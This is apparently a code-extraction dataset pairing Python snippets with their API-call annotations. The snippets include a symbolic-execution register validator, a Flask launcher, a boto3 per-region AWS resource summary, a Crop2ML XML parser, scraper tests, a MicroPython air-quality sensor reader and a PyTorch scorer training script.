if reg_dict[reg]['fields'][f]['access'] == spec_reg.Access.IW:
# Validating this field is optional
valid = True
for action, info in _cache.get(reg, []):
# Does the action match writing to this field?
action_matches = False
if reg_dict[reg]['fields'][f]['end'] != reg_dict[reg]['fields'][f]['start']:
action_matches = info['action'].isWriteFieldCorrect(state, f"{reg}.{f}", new)
elif info['action'].isFieldSetOrCleared(f"{reg}.{f}", ast_util.AST.Set) and utils.definitely_true(state.solver, new == claripy.BVV(-1, new.size())):
action_matches = True
elif info['action'].isFieldSetOrCleared(f"{reg}.{f}", ast_util.AST.Clear) and utils.definitely_true(state.solver, new == 0):
action_matches = True
if not action_matches:
continue
# If there is no precondition, the action is valid
precond_sat = True
if info['precond'] != None:
con = info['precond'].generateConstraints(device, spec_reg.registers, spec_reg.pci_regs, index)
precond_sat = utils.definitely_true(state.solver, con)
if not precond_sat:
rejected.append(action)
continue
valid = True
print("Action: ", action)
if action == 'Initiate Software Reset':
device.use_init[0] = True
device.latest_action[0] = action
if action in device.actions.keys():
# We have seen this action before
device.actions[action] = device.actions[action] + [counter]
else:
device.actions[action] = [counter]
if valid:
continue
if len(rejected) == 0:
raise Exception(f"Cannot validate writing to {reg}.{f}. There are no actions that match writing to this field.")
if not valid:
raise Exception(f"Cannot validate writing to {reg}.{f}. Matching but rejected actions: {rejected}. Maybe the precondition is not satisfied for one of them?")
# If we did not raise any exception, that means we are able to match
# concurrent writes to actions. Increment counter to establish
# action order.
device.counter[0] = counter + 1
|
[
"kalm.utils.definitely_true",
"claripy.BVV",
"kalm.utils.definitely_false",
"claripy.BVS"
] |
[((606, 641), 'claripy.BVV', 'claripy.BVV', (['value', '(end - start + 1)'], {}), '(value, end - start + 1)\n', (617, 641), False, 'import claripy\n'), ((1255, 1288), 'claripy.BVS', 'claripy.BVS', (['name', "data['length']"], {}), "(name, data['length'])\n", (1266, 1288), False, 'import claripy\n'), ((2487, 2521), 'claripy.BVV', 'claripy.BVV', (['value', "data['length']"], {}), "(value, data['length'])\n", (2498, 2521), False, 'import claripy\n'), ((4249, 4269), 'claripy.BVS', 'claripy.BVS', (['"""n"""', '(64)'], {}), "('n', 64)\n", (4260, 4269), False, 'import claripy\n'), ((5801, 5833), 'claripy.BVS', 'claripy.BVS', (['reg', "data['length']"], {}), "(reg, data['length'])\n", (5812, 5833), False, 'import claripy\n'), ((8741, 8773), 'claripy.BVV', 'claripy.BVV', (['val', "data['length']"], {}), "(val, data['length'])\n", (8752, 8773), False, 'import claripy\n'), ((4571, 4619), 'kalm.utils.definitely_false', 'utils.definitely_false', (['state.solver', 'constraint'], {}), '(state.solver, constraint)\n', (4593, 4619), False, 'from kalm import utils\n'), ((8943, 8970), 'claripy.BVV', 'claripy.BVV', (['new', 'value_len'], {}), '(new, value_len)\n', (8954, 8970), False, 'import claripy\n'), ((11217, 11257), 'kalm.utils.definitely_true', 'utils.definitely_true', (['state.solver', 'con'], {}), '(state.solver, con)\n', (11238, 11257), False, 'from kalm import utils\n'), ((9007, 9034), 'claripy.BVV', 'claripy.BVV', (['new', 'value_len'], {}), '(new, value_len)\n', (9018, 9034), False, 'import claripy\n'), ((10782, 10827), 'kalm.utils.definitely_true', 'utils.definitely_true', (['state.solver', '(new == 0)'], {}), '(state.solver, new == 0)\n', (10803, 10827), False, 'from kalm import utils\n')]
|
from app import app
HOST = "localhost"
PORT = 5000
if __name__ == '__main__':
app.run(HOST, PORT, debug=True)
|
[
"app.app.run"
] |
[((84, 115), 'app.app.run', 'app.run', (['HOST', 'PORT'], {'debug': '(True)'}), '(HOST, PORT, debug=True)\n', (91, 115), False, 'from app import app\n')]
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os, sys
from datetime import datetime
from typing import List
import boto3
import botocore.exceptions
from . import register_parser
from .util import ThreadPoolExecutor
from .util.printing import format_table, page_output
def get_stats_for_region(region):
try:
session = boto3.Session(region_name=region)
num_instances = len(list(session.resource("ec2").instances.all()))
num_amis = len(list(session.resource("ec2").images.filter(Owners=["self"])))
num_vpcs = len(list(session.resource("ec2").vpcs.all()))
num_enis = len(list(session.resource("ec2").network_interfaces.all()))
num_volumes = len(list(session.resource("ec2").volumes.all()))
except botocore.exceptions.ClientError:
num_instances, num_amis, num_vpcs, num_enis, num_volumes = ["Access denied"] * 5 # type: ignore
return [region, num_instances, num_amis, num_vpcs, num_enis, num_volumes]
def top(args):
table = [] # type: List[List]
columns = ["Region", "Instances", "AMIs", "VPCs", "Network interfaces", "EBS volumes"]
executor = ThreadPoolExecutor()
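    # Gather per-region stats in parallel; each row of the table is one region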
table = list(executor.map(get_stats_for_region, boto3.Session().get_available_regions("ec2")))
page_output(format_table(table, column_names=columns, max_col_width=args.max_col_width))
parser = register_parser(top, help='Show an overview of AWS resources per region')
|
[
"boto3.Session"
] |
[((377, 410), 'boto3.Session', 'boto3.Session', ([], {'region_name': 'region'}), '(region_name=region)\n', (390, 410), False, 'import boto3\n'), ((1243, 1258), 'boto3.Session', 'boto3.Session', ([], {}), '()\n', (1256, 1258), False, 'import boto3\n')]
|
from numpy import ndarray
from src.domain.cs_column import Column
import numpy as np
from src.model.stop_at_station_summary import StopAtStationSummary
class CargoSpace(object):
""" Represents cargo space in transport vehicle/ship ect.
"""
def __init__(self, width: int, height: int):
self._width: int = width
self._height: int = height
self._columns: list = [Column(height) for i in range(width)]
@property
def columns(self) -> list:
return self._columns
def simulate_stop_at_station(self, station_index: int, packages_to_load: list) -> StopAtStationSummary:
""" Simulates stop at station, unloads, loads packages and monitors activities.
Args:
station_index: Current station index.
packages_to_load: List of packages to load at this station.
Returns: Summary of process and current state of cargo space.
"""
movements_sum = 0
wait_que = []
packages_per_col = np.zeros(len(self._columns), dtype=int)
# Unload packages for current station.
movements_sum += self._unload_packages(packages_per_col, wait_que, station_index)
# Load packages for current station.
movements_sum += self._load_packages(packages_to_load, packages_per_col)
        # Load packages from the waiting queue.
movements_sum += self._load_packages(wait_que, packages_per_col)
return StopAtStationSummary(
movements_sum=movements_sum,
layout_dist=packages_per_col.tolist(),
weight_dist=[column.sum_weight for column in self._columns]
)
def _unload_packages(self, packages_per_col: ndarray, wait_que: list, station_index: int) -> int:
movement = 0
for index, column in enumerate(self._columns):
ret_que, ret_movements = column.unload_at_station(station_index)
movement += ret_movements
wait_que += ret_que
packages_per_col[index] = column.count()
return movement
def _load_packages(self, packages_to_load: list, packages_per_col: ndarray) -> int:
movements = 0
for package in packages_to_load:
add_index = package.given_col_index
if packages_per_col[add_index] == self._height:
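                # Preferred column is full; fall back to the least-filled column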
add_index = np.argmin(packages_per_col)
self._columns[add_index].add(package)
packages_per_col[add_index] += 1
movements += 1
return movements
|
[
"src.domain.cs_column.Column",
"numpy.argmin"
] |
[((407, 421), 'src.domain.cs_column.Column', 'Column', (['height'], {}), '(height)\n', (413, 421), False, 'from src.domain.cs_column import Column\n'), ((2339, 2366), 'numpy.argmin', 'np.argmin', (['packages_per_col'], {}), '(packages_per_col)\n', (2348, 2366), True, 'import numpy as np\n')]
|
""" License, Header
"""
from __future__ import absolute_import
from __future__ import print_function
from copy import copy
import xml.etree.ElementTree as xml
from . import modelunit as munit
from . import description
from . import inout
from . import parameterset as pset
from . import checking
from . import algorithm
from . import function
from . import initialization
import os.path
import os
from path import Path
class Parser(object):
""" Read an XML file and transform it in our object model.
"""
def parse(self, crop2ml_dir):
raise Exception('Not Implemented')
def dispatch(self, elt):
return self.__getattribute__(elt.tag)(elt)
class ModelParser(Parser):
""" Read an XML file and transform it in our object model.
"""
def parse(self, crop2ml_dir):
self.models = []
self.crop2ml_dir = crop2ml_dir
xmlrep = Path(os.path.join(self.crop2ml_dir,'crop2ml'))
self.algorep = Path(os.path.join(self.crop2ml_dir,'crop2ml'))
fn = xmlrep.glob('unit*.xml')+xmlrep.glob('function*.xml')+xmlrep.glob('init*.xml')
try:
for f in fn:
# Current proxy node for managing properties
doc = xml.parse(f)
root = doc.getroot()
self.dispatch(root)
except Exception as e:
print(("%s is NOT in CropML Format ! %s" % (f, e)))
return self.models
def dispatch(self, elt):
#try:
return self.__getattribute__(elt.tag)(elt)
#except Exception, e:
# print e
#raise Exception("Unvalid element %s" % elt.tag)
def ModelUnit(self, elts):
""" ModelUnit (Description,Inputs,Outputs,Algorithm,Parametersets,
Testsets)
"""
#print('ModelUnit')
kwds = elts.attrib
self._model = munit.ModelUnit(kwds)
self._model.path = os.path.abspath(self.crop2ml_dir)
self.models.append(self._model)
for elt in list(elts):
self.dispatch(elt)
def Description(self, elts):
""" Description (Title,Author,Institution,Reference,Abstract)
"""
#print('Description')
desc = description.Description()
for elt in list(elts):
self.name = desc.__setattr__(elt.tag, elt.text)
self._model.add_description(desc)
def Inputs(self, elts):
""" Inputs (Input)
"""
#print('Inputs')
for elt in list(elts):
self.dispatch(elt)
def Input(self, elts):
""" Input
"""
#print('Input: ')
properties = elts.attrib
_input = inout.Input(properties)
self._model.inputs.append(_input)
def Outputs(self, elts):
""" Ouputs (Output)
"""
#print('Outputs')
for elt in list(elts):
self.dispatch(elt)
def Output(self, elts):
""" Output
"""
#print('Output: ')
properties = elts.attrib
_output = inout.Output(properties)
self._model.outputs.append(_output)
def Initialization(self, elt):
language=elt.attrib["language"]
name=elt.attrib["name"]
filename=elt.attrib["filename"]
#description =elt.attrib["description"]
code = initialization.Initialization(name,language, filename)
self._model.initialization.append(code)
def Function(self, elt):
language=elt.attrib["language"]
name=elt.attrib["name"]
filename=elt.attrib["filename"]
type=elt.attrib["type"]
description =elt.attrib["description"]
code = function.Function(name, language, filename, type, description)
self._model.function.append(code)
def Algorithm(self, elt):
""" Algorithm
"""
#print('Algorithm')
language=elt.attrib["language"]
platform=elt.attrib["platform"]
if "filename" in elt.attrib:
filename=elt.attrib["filename"]
#file = self.algorep/ os.path.splitext(filename)[1][1:]/filename
file = Path(os.path.join(self.algorep,filename))
with open(file, 'r') as f:
development = f.read()
algo = algorithm.Algorithm(language, development, platform, filename)
else:
development = elt.text
algo = algorithm.Algorithm(language, development, platform)
self._model.algorithms.append(algo)
def Parametersets(self, elts):
""" Parametersets (Parameterset)
"""
#print('Parametersets')
for elt in list(elts):
self.Parameterset(elt)
def Parameterset(self, elts):
""" Parameterset
"""
#print('Parameterset: ')
properties = elts.attrib
name = properties.pop('name')
_parameterset = pset.parameterset(self._model, name, properties)
for elt in list(elts):
self.param(_parameterset, elt)
name = _parameterset.name
self._model.parametersets[name] = _parameterset
def param(self, pset, elt):
""" Param
"""
#print('Param: ', elt.attrib, elt.text)
properties = elt.attrib
name = properties['name']
pset.params[name] = elt.text
def Testsets(self, elts):
""" Testsets (Testset)
"""
#print('Testsets')
for elt in list(elts):
self.Testset(elt)
self.testsets = self._model.testsets
def Testset(self, elts):
""" Testset(Test)
"""
#print('Testset')
properties = elts.attrib
name = properties.pop('name')
#print name
_testset = checking.testset(self._model, name, properties)
for elt in list(elts):
#print elt
testname = elt.attrib['name'] # name of test
#print(testname)
input_test={}
output_test={}
param_test={}
#_test = checking.Test(name)
for j in elt.findall("InputValue"): # all inputs
name = j.attrib["name"]
input_test[name]=j.text
for j in elt.findall("OutputValue"): # all outputs
name = j.attrib["name"]
if len(j.attrib)==2:
output_test[name]=[j.text,j.attrib["precision"]]
else: output_test[name]=[j.text]
param_test = {"inputs":input_test, "outputs":output_test}
_testset.test.append({testname:param_test})
#self._model.testsets.setdefault(name, []).append(_testset)
self._model.testsets.append(_testset)
def model_parser(crop2ml_dir):
""" Parse a set of models as xml files contained in crop2ml directory
and algorithm in src directory
This function returns models as python object.
Returns ModelUnit object of the Crop2ML Model.
"""
parser = ModelParser()
return parser.parse(crop2ml_dir)
|
[
"xml.etree.ElementTree.parse",
"os.path.abspath",
"os.path.join"
] |
[((1958, 1991), 'os.path.abspath', 'os.path.abspath', (['self.crop2ml_dir'], {}), '(self.crop2ml_dir)\n', (1973, 1991), False, 'import os\n'), ((890, 931), 'os.path.join', 'os.path.join', (['self.crop2ml_dir', '"""crop2ml"""'], {}), "(self.crop2ml_dir, 'crop2ml')\n", (902, 931), False, 'import os\n'), ((960, 1001), 'os.path.join', 'os.path.join', (['self.crop2ml_dir', '"""crop2ml"""'], {}), "(self.crop2ml_dir, 'crop2ml')\n", (972, 1001), False, 'import os\n'), ((1232, 1244), 'xml.etree.ElementTree.parse', 'xml.parse', (['f'], {}), '(f)\n', (1241, 1244), True, 'import xml.etree.ElementTree as xml\n'), ((4226, 4262), 'os.path.join', 'os.path.join', (['self.algorep', 'filename'], {}), '(self.algorep, filename)\n', (4238, 4262), False, 'import os\n')]
|
from datetime import date, time
import pytest
import json
from city_scrapers.spiders.chi_water import Chi_waterSpider
test_response = []
with open('tests/files/chi_water_test.json') as f:
test_response.extend(json.loads(f.read()))
spider = Chi_waterSpider()
# This line throws error
parsed_items = [item for item in spider._parse_events(test_response)]
##### Test Single Instance #####
def test_name():
assert parsed_items[0]['name'] == 'Board of Commissioners'
def test_description():
assert parsed_items[0]['event_description'] == 'no agenda posted'
def test_start_time():
assert parsed_items[0]['start'] == {
'date': date(2018, 12, 20),
'time': time(10, 30, 00),
'note': ''
}
def test_id():
assert parsed_items[0]['id'] == 'chi_water/201812201030/x/board_of_commissioners'
def test_location():
assert parsed_items[0]['location'] == {
'address': '100 East Erie Street Chicago, IL 60611',
'name': 'Board Room',
'neighborhood': 'River North'
}
def test_sources():
assert parsed_items[0]['sources'] == [{'note': '',
'url': 'https://mwrd.legistar.com/DepartmentDetail.aspx?ID=1622&GUID=5E16B4CD-0692-4016-959D-3F080D6CFFB4'}]
def test_documents():
assert parsed_items[0]['documents'] == [
{
'url': 'https://mwrd.legistar.com/MeetingDetail.aspx?ID=570944&GUID=DF1E81E4-2660-42AF-A398-8296420B9341&Options=info&Search=',
'note': 'meeting details'
},
]
def test_documents_with_agenda():
assert parsed_items[-2]['documents'] == [
{'url': 'https://mwrd.legistar.com/MeetingDetail.aspx?ID=437015&GUID=639F6AB7-6E76-4429-B6F5-FCEB3DC609C5&Options=info&Search=',
'note': 'meeting details'},
{'url': 'https://mwrd.legistar.com/View.ashx?M=A&ID=437015&GUID=639F6AB7-6E76-4429-B6F5-FCEB3DC609C5',
'note': 'agenda'}
]
@pytest.mark.parametrize('item', parsed_items)
def test_name_not_study_session(item):
assert item['name'] != 'Study Session'
def test_status():
assert parsed_items[-1]['status'] == 'passed'
##### Parameterized Tests #####
@pytest.mark.parametrize('item', parsed_items)
def test_type(item):
    assert item['_type'] == 'event'
@pytest.mark.parametrize('item', parsed_items)
def test_all_day(item):
assert item['all_day'] is False
@pytest.mark.parametrize('item', parsed_items)
def test_classification(item):
assert item['classification'] == ''
@pytest.mark.parametrize('item', parsed_items)
def test_end_time(item):
assert item['end'] == {
'date': None,
'time': None,
'note': ''
}
|
[
"pytest.mark.parametrize",
"city_scrapers.spiders.chi_water.Chi_waterSpider",
"datetime.date",
"datetime.time"
] |
[((247, 264), 'city_scrapers.spiders.chi_water.Chi_waterSpider', 'Chi_waterSpider', ([], {}), '()\n', (262, 264), False, 'from city_scrapers.spiders.chi_water import Chi_waterSpider\n'), ((1899, 1944), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (1922, 1944), False, 'import pytest\n'), ((2133, 2178), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2156, 2178), False, 'import pytest\n'), ((2238, 2283), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2261, 2283), False, 'import pytest\n'), ((2346, 2391), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2369, 2391), False, 'import pytest\n'), ((2465, 2510), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2488, 2510), False, 'import pytest\n'), ((655, 673), 'datetime.date', 'date', (['(2018)', '(12)', '(20)'], {}), '(2018, 12, 20)\n', (659, 673), False, 'from datetime import date, time\n'), ((695, 710), 'datetime.time', 'time', (['(10)', '(30)', '(0)'], {}), '(10, 30, 0)\n', (699, 710), False, 'from datetime import date, time\n')]
|
import gc
import uasyncio as asyncio
import ujson
import utime
from machine import UART, WDT
import ustruct as struct
import logger
from config import read_configuration
c = read_configuration()
wdt = WDT(timeout=600000)
async def start_readings(client):
while True:
logger.log('Initialising UART bus')
uart = UART(1, 9600)
uart.init(9600, bits=8, parity=None, rx=16, timeout=250)
count = 0
while count < 30:
# logger.log('Warming sensor up, reading #%d of 30' % count)
await read_sensor(uart)
count = count + 1
await asyncio.sleep(1)
logger.log('Finished warming up')
data = await read_sensor(uart)
if data is None:
await asyncio.sleep(1)
await read_sensor(uart)
logger.log(data)
logger.log('Turning off UART bus')
uart.deinit()
timestamp = (utime.time() + 946684800) * 1000
data['timestamp'] = timestamp
json = ujson.dumps(data)
await client.publish(c['topic'], json, qos = 1, retain = True)
wdt.feed()
await asyncio.sleep(180)
async def read_sensor(uart):
try:
buffer = []
data = uart.read(32)
if data is None:
logger.log('No data received, re-running')
await asyncio.sleep(1)
return
data = list(data)
gc.collect()
buffer += data
while buffer and buffer[0] != 0x42:
buffer.pop(0)
# Avoid an overrun if all bad data
if len(buffer) > 200:
buffer = []
if len(buffer) < 32:
            logger.log('Buffer length < 32, re-running')
await asyncio.sleep(1)
await read_sensor(uart)
if buffer[1] != 0x4d:
logger.log('Second element of buffer was not 0x4d, re-running')
buffer.pop(0)
await asyncio.sleep(1)
await read_sensor(uart)
frame_len = struct.unpack(">H", bytes(buffer[2:4]))[0]
gc.collect()
if frame_len != 28:
buffer = []
logger.log('Frame length was not 28, re-running')
await asyncio.sleep(1)
await read_sensor(uart)
# In order:
# - PM1.0 standard
# - PM2.5 standard
# - PM10 standard
# - PM1.0 environmental
# - PM2.5 environmental
# - PM10 environmental
        # - Particles > 0.3um / 0.1L air
# - Particles > 0.5um / 0.1L air
# - Particles > 1.0um / 0.1L air
# - Particles > 2.5um / 0.1L air
# - Particles > 5.0um / 0.1L air
# - Particles > 10um / 0.1L air
# - Skip
# - Checksum
frame = struct.unpack(">HHHHHHHHHHHHHH", bytes(buffer[4:]))
check = sum(buffer[0:30])
if check != frame[-1]:
buffer = []
logger.log('Checksums don\'t match, re-running')
await asyncio.sleep(1)
await read_sensor(uart)
buffer = buffer[32:]
return {
'pm_1_0': frame[3],
'pm_2_5': frame[4],
'pm_10': frame[5],
'particles_0_3um': frame[6],
'particles_0_5um': frame[7],
'particles_1_0um': frame[8],
'particles_2_5um': frame[9],
'particles_5_0um': frame[10],
'particles_10um': frame[11],
}
except Exception as e:
logger.log(e)
|
[
"utime.time",
"logger.log",
"config.read_configuration",
"gc.collect",
"machine.WDT",
"uasyncio.sleep",
"ujson.dumps",
"machine.UART"
] |
[((175, 195), 'config.read_configuration', 'read_configuration', ([], {}), '()\n', (193, 195), False, 'from config import read_configuration\n'), ((203, 222), 'machine.WDT', 'WDT', ([], {'timeout': '(600000)'}), '(timeout=600000)\n', (206, 222), False, 'from machine import UART, WDT\n'), ((282, 317), 'logger.log', 'logger.log', (['"""Initialising UART bus"""'], {}), "('Initialising UART bus')\n", (292, 317), False, 'import logger\n'), ((333, 346), 'machine.UART', 'UART', (['(1)', '(9600)'], {}), '(1, 9600)\n', (337, 346), False, 'from machine import UART, WDT\n'), ((641, 674), 'logger.log', 'logger.log', (['"""Finished warming up"""'], {}), "('Finished warming up')\n", (651, 674), False, 'import logger\n'), ((820, 836), 'logger.log', 'logger.log', (['data'], {}), '(data)\n', (830, 836), False, 'import logger\n'), ((846, 880), 'logger.log', 'logger.log', (['"""Turning off UART bus"""'], {}), "('Turning off UART bus')\n", (856, 880), False, 'import logger\n'), ((1012, 1029), 'ujson.dumps', 'ujson.dumps', (['data'], {}), '(data)\n', (1023, 1029), False, 'import ujson\n'), ((1416, 1428), 'gc.collect', 'gc.collect', ([], {}), '()\n', (1426, 1428), False, 'import gc\n'), ((2057, 2069), 'gc.collect', 'gc.collect', ([], {}), '()\n', (2067, 2069), False, 'import gc\n'), ((1137, 1155), 'uasyncio.sleep', 'asyncio.sleep', (['(180)'], {}), '(180)\n', (1150, 1155), True, 'import uasyncio as asyncio\n'), ((1283, 1325), 'logger.log', 'logger.log', (['"""No data received, re-running"""'], {}), "('No data received, re-running')\n", (1293, 1325), False, 'import logger\n'), ((1664, 1708), 'logger.log', 'logger.log', (['"""Buffer length > 32, re-running"""'], {}), "('Buffer length > 32, re-running')\n", (1674, 1708), False, 'import logger\n'), ((1823, 1886), 'logger.log', 'logger.log', (['"""Second element of buffer was not 0x4d, re-running"""'], {}), "('Second element of buffer was not 0x4d, re-running')\n", (1833, 1886), False, 'import logger\n'), ((2135, 2184), 'logger.log', 'logger.log', (['"""Frame length was not 28, re-running"""'], {}), "('Frame length was not 28, re-running')\n", (2145, 2184), False, 'import logger\n'), ((2919, 2966), 'logger.log', 'logger.log', (['"""Checksums don\'t match, re-running"""'], {}), '("Checksums don\'t match, re-running")\n', (2929, 2966), False, 'import logger\n'), ((3476, 3489), 'logger.log', 'logger.log', (['e'], {}), '(e)\n', (3486, 3489), False, 'import logger\n'), ((615, 631), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (628, 631), True, 'import uasyncio as asyncio\n'), ((758, 774), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (771, 774), True, 'import uasyncio as asyncio\n'), ((925, 937), 'utime.time', 'utime.time', ([], {}), '()\n', (935, 937), False, 'import utime\n'), ((1344, 1360), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1357, 1360), True, 'import uasyncio as asyncio\n'), ((1727, 1743), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1740, 1743), True, 'import uasyncio as asyncio\n'), ((1931, 1947), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1944, 1947), True, 'import uasyncio as asyncio\n'), ((2203, 2219), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (2216, 2219), True, 'import uasyncio as asyncio\n'), ((2986, 3002), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (2999, 3002), True, 'import uasyncio as asyncio\n')]
|
import json
import random
import pysparkling
import torch
from .decoder.utils.instance_scorer import InstanceScorer
from . import show
DATA_FILE = ('outputs/resnet101block5-pif-paf-edge401-190412-151013.pkl'
'.decodertraindata-edge641-samples0.json')
# pylint: skip-file
def plot_training_data(train_data, val_data, entry=0, entryname=None):
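    # Overlay histograms of the chosen feature column for true/false targets, comparing train and val splits.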
train_x, train_y = train_data
val_x, val_y = val_data
with show.canvas() as ax:
ax.hist([xx[entry] for xx in train_x[train_y[:, 0] == 1]],
bins=50, alpha=0.3, density=True, color='navy', label='train true')
ax.hist([xx[entry] for xx in train_x[train_y[:, 0] == 0]],
bins=50, alpha=0.3, density=True, color='orange', label='train false')
ax.hist([xx[entry] for xx in val_x[val_y[:, 0] == 1]],
histtype='step', bins=50, density=True, color='navy', label='val true')
ax.hist([xx[entry] for xx in val_x[val_y[:, 0] == 0]],
histtype='step', bins=50, density=True, color='orange', label='val false')
if entryname:
ax.set_xlabel(entryname)
ax.legend()
def train_val_split_score(data, train_fraction=0.6, balance=True):
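    # Collect ([score], [target]) pairs, optionally balance the classes by random subsampling, then split into train/val tensors.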
xy_list = data.map(lambda d: ([d['score']], [float(d['target'])])).collect()
if balance:
n_true = sum(1 for x, y in xy_list if y[0] == 1.0)
n_false = sum(1 for x, y in xy_list if y[0] == 0.0)
p_true = min(1.0, n_false / n_true)
p_false = min(1.0, n_true / n_false)
xy_list = [(x, y) for x, y in xy_list
if random.random() < (p_true if y[0] == 1.0 else p_false)]
n_train = int(train_fraction * len(xy_list))
return (
(torch.tensor([x for x, _ in xy_list[:n_train]]),
torch.tensor([y for _, y in xy_list[:n_train]])),
(torch.tensor([x for x, _ in xy_list[n_train:]]),
torch.tensor([y for _, y in xy_list[n_train:]])),
)
def train_val_split_keypointscores(data, train_fraction=0.6):
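    # Features are the score plus per-keypoint confidences and joint scales; split sequentially into train/val tensors.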
xy_list = (
data
.map(lambda d: ([d['score']] + [xyv[2] for xyv in d['keypoints']] + d['joint_scales'],
[float(d['target'])]))
.collect()
)
n_train = int(train_fraction * len(xy_list))
return (
(torch.tensor([x for x, _ in xy_list[:n_train]]),
torch.tensor([y for _, y in xy_list[:n_train]])),
(torch.tensor([x for x, _ in xy_list[n_train:]]),
torch.tensor([y for _, y in xy_list[n_train:]])),
)
def train_epoch(model, loader, optimizer):
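    # One training pass: binary cross-entropy loss, backprop and optimizer step per batch; returns the mean loss.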
epoch_loss = 0.0
for x, y in loader:
optimizer.zero_grad()
y_hat = model(x)
loss = torch.nn.functional.binary_cross_entropy(y_hat, y)
epoch_loss += float(loss.item())
loss.backward()
optimizer.step()
return epoch_loss / len(loader)
def val_epoch(model, loader):
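    # Evaluation pass without gradient tracking; returns the mean loss over the loader.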
epoch_loss = 0.0
with torch.no_grad():
for x, y in loader:
y_hat = model(x)
loss = torch.nn.functional.binary_cross_entropy(y_hat, y)
epoch_loss += float(loss.item())
return epoch_loss / len(loader)
def main():
sc = pysparkling.Context()
data = sc.textFile(DATA_FILE).map(json.loads).cache()
train_data_score, val_data_score = train_val_split_score(data)
plot_training_data(train_data_score, val_data_score, entryname='score')
train_data, val_data = train_val_split_keypointscores(data)
model = InstanceScorer()
train_dataset = torch.utils.data.TensorDataset(*train_data)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=256, shuffle=True)
val_dataset = torch.utils.data.TensorDataset(*val_data)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=256, shuffle=False)
optimizer = torch.optim.SGD(model.parameters(), lr=1e-3, momentum=0.9)
for epoch_i in range(100):
train_loss = train_epoch(model, train_loader, optimizer)
val_loss = val_epoch(model, val_loader)
print(epoch_i, train_loss, val_loss)
with torch.no_grad():
post_train_data = (model(train_data[0]), train_data[1])
post_val_data = (model(val_data[0]), val_data[1])
plot_training_data(post_train_data, post_val_data, entryname='optimized score')
torch.save(model, 'instance_scorer.pkl')
if __name__ == '__main__':
main()
|
[
"torch.nn.functional.binary_cross_entropy",
"pysparkling.Context",
"torch.utils.data.DataLoader",
"torch.save",
"random.random",
"torch.utils.data.TensorDataset",
"torch.no_grad",
"torch.tensor"
] |
[((3160, 3181), 'pysparkling.Context', 'pysparkling.Context', ([], {}), '()\n', (3179, 3181), False, 'import pysparkling\n'), ((3500, 3543), 'torch.utils.data.TensorDataset', 'torch.utils.data.TensorDataset', (['*train_data'], {}), '(*train_data)\n', (3530, 3543), False, 'import torch\n'), ((3563, 3635), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_dataset'], {'batch_size': '(256)', 'shuffle': '(True)'}), '(train_dataset, batch_size=256, shuffle=True)\n', (3590, 3635), False, 'import torch\n'), ((3655, 3696), 'torch.utils.data.TensorDataset', 'torch.utils.data.TensorDataset', (['*val_data'], {}), '(*val_data)\n', (3685, 3696), False, 'import torch\n'), ((3714, 3785), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['val_dataset'], {'batch_size': '(256)', 'shuffle': '(False)'}), '(val_dataset, batch_size=256, shuffle=False)\n', (3741, 3785), False, 'import torch\n'), ((4288, 4328), 'torch.save', 'torch.save', (['model', '"""instance_scorer.pkl"""'], {}), "(model, 'instance_scorer.pkl')\n", (4298, 4328), False, 'import torch\n'), ((2671, 2721), 'torch.nn.functional.binary_cross_entropy', 'torch.nn.functional.binary_cross_entropy', (['y_hat', 'y'], {}), '(y_hat, y)\n', (2711, 2721), False, 'import torch\n'), ((2911, 2926), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2924, 2926), False, 'import torch\n'), ((4061, 4076), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4074, 4076), False, 'import torch\n'), ((1716, 1763), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[:n_train]]'], {}), '([x for x, _ in xy_list[:n_train]])\n', (1728, 1763), False, 'import torch\n'), ((1774, 1821), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[:n_train]]'], {}), '([y for _, y in xy_list[:n_train]])\n', (1786, 1821), False, 'import torch\n'), ((1833, 1880), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[n_train:]]'], {}), '([x for x, _ in xy_list[n_train:]])\n', (1845, 1880), False, 'import torch\n'), ((1891, 1938), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[n_train:]]'], {}), '([y for _, y in xy_list[n_train:]])\n', (1903, 1938), False, 'import torch\n'), ((2279, 2326), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[:n_train]]'], {}), '([x for x, _ in xy_list[:n_train]])\n', (2291, 2326), False, 'import torch\n'), ((2337, 2384), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[:n_train]]'], {}), '([y for _, y in xy_list[:n_train]])\n', (2349, 2384), False, 'import torch\n'), ((2396, 2443), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[n_train:]]'], {}), '([x for x, _ in xy_list[n_train:]])\n', (2408, 2443), False, 'import torch\n'), ((2454, 2501), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[n_train:]]'], {}), '([y for _, y in xy_list[n_train:]])\n', (2466, 2501), False, 'import torch\n'), ((3004, 3054), 'torch.nn.functional.binary_cross_entropy', 'torch.nn.functional.binary_cross_entropy', (['y_hat', 'y'], {}), '(y_hat, y)\n', (3044, 3054), False, 'import torch\n'), 